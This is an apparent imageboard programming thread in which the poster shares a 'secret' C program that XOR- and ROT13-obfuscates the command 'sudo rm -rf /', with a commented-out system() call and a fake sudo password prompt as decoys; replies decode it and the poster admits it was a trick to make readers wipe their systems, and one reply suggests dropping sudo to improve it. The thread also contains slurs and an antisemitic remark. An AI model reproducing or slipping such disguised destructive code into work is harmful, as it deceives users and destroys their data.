Secret

Can you figure out what this secret program does? It's so secret, even I don't know what it is. Nothing seems to happen when I run it.

#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pwd.h>
#include <time.h>

#define SUPERSECRET    "OAXQ)HI)$HZ)&"

static int secret(char* buffer, int count, int key1, int key2)
{
    int i, ret = 0;

    if ((((int)rand()) % 2) == 0) {
        for (i = 0; i < count; ++i)
            buffer[i] ^= key1;
    } else {
        for (i = 0; i < count; ++i)
            buffer[i] ^= key2;
    }
    for (i = 0; i < count; ++i) {
        int c = tolower(buffer[i]);
        if ((c < 'a') || (c > 'z'))
            continue;
        else if (c <= 'a' + 13)
            c += 13;
        else
            c -= 13;
        buffer[i] = c;
    }
    if ((((int)rand()) % 2) == 0) {
        for (i = 0; i < count; ++i)
            buffer[i] ^= key2;
    } else {
        for (i = 0; i < count; ++i)
            buffer[i] ^= key1;
    }
    for (i = 0; i < count; ++i) {
        buffer[i] = tolower(buffer[i]);
        ret += buffer[i];
    }
    return ret;
}

int main()
{
    char* buffer = calloc(strlen(SUPERSECRET) + 1, 1);
    int ret;
    srand((unsigned)time(NULL));
    while (ret != 1070) {
        strncpy(buffer, SUPERSECRET, strlen(SUPERSECRET));
        ret = secret(buffer, (int)strlen(buffer), 43, 34);
    }
    if ((ret & 31) == 31) {
        fprintf(stderr, "[sudo] password for %s", getenv("USER"));
        getpass(": ");
    }
//    system(buffer);
    free(buffer);
    return 0;
}

Seems to encrypt something.

>>2
That doesn't explain the pseudo-sudo stuff at the end of main(). I tried uncommenting the call to system(), but all it did was print some random text.

buffer always contains "sudo rm -rf /" after the while-loop.
Cool stuff...

But what's the if-statement for?
As far as I see it's never executed, 'cause ret is always 1070 after the while-loop. Someone enlighten me?

It's ROT13, idiot. It just asks for the sudo password and tried to delete system32, I mean /.

>>5
It doesn't ask for the password. It never does...

doing memory operations on macro-defined shit

reported

Ok, OP here, I was bored and wanted to see if I could trick anyone into executing "sudo rm -rf /" in a ridiculously roundabout way. I wasn't expecting anyone on /prog/ to be dumb enough to run it, before anyone asks. I also posted it on /g/ but Firefox decided not to noko and I lost the thread (lol).

The "secret" function is a xor cypher which is then ROT13'd and then xor'd again with two different keys. I wrote a smaller version, put the text as "sudo rm -rf /", and then got the #define'd text. Then I reversed the keys so that it would be undone to transform the text back into "sudo rm -rf /". Then I added the calls to rand() as a red herring. Then, to confirm that the correct string was being generated, I summed the ASCII values of the characters in "sudo rm -rf /" (1070) and used that to make sure it was generating the right string (because of the rand() calls, there are 4 strings it can generate from the same input text). Then I added the pseudo-sudo thing at the end as another red herring, because when the command is executed it'll ask for the user's password. That was to make it look like it was the program pretending to be sudo, rather than the actual sudo command being executed.

And I would've gotten away with it too, if it weren't for you meddling jews.

Also, >>7 can't read. It never operates directly on the SUPERSECRET string, it's only ever copied into a buffer.

>>8

red herring

You are an autist like Lambda A. Calculus.

>>8

ur a fag, dude

>>8
joke's on you pal, i was running Haiku

>>8
You would probably have more success if you made it rm -rf / instead of requiring sudo, besides I'm pretty sure nobody is stupid enough to run anything with system in it without printing the buffer first, at least not when it requires root access.

http://www.youtube.com/watch?v=NjTseHtgb0o

>2:35

LOOOOOOOOOOOOOOOOOL

we xor and rot13 in this bitch

>>15
>we xor now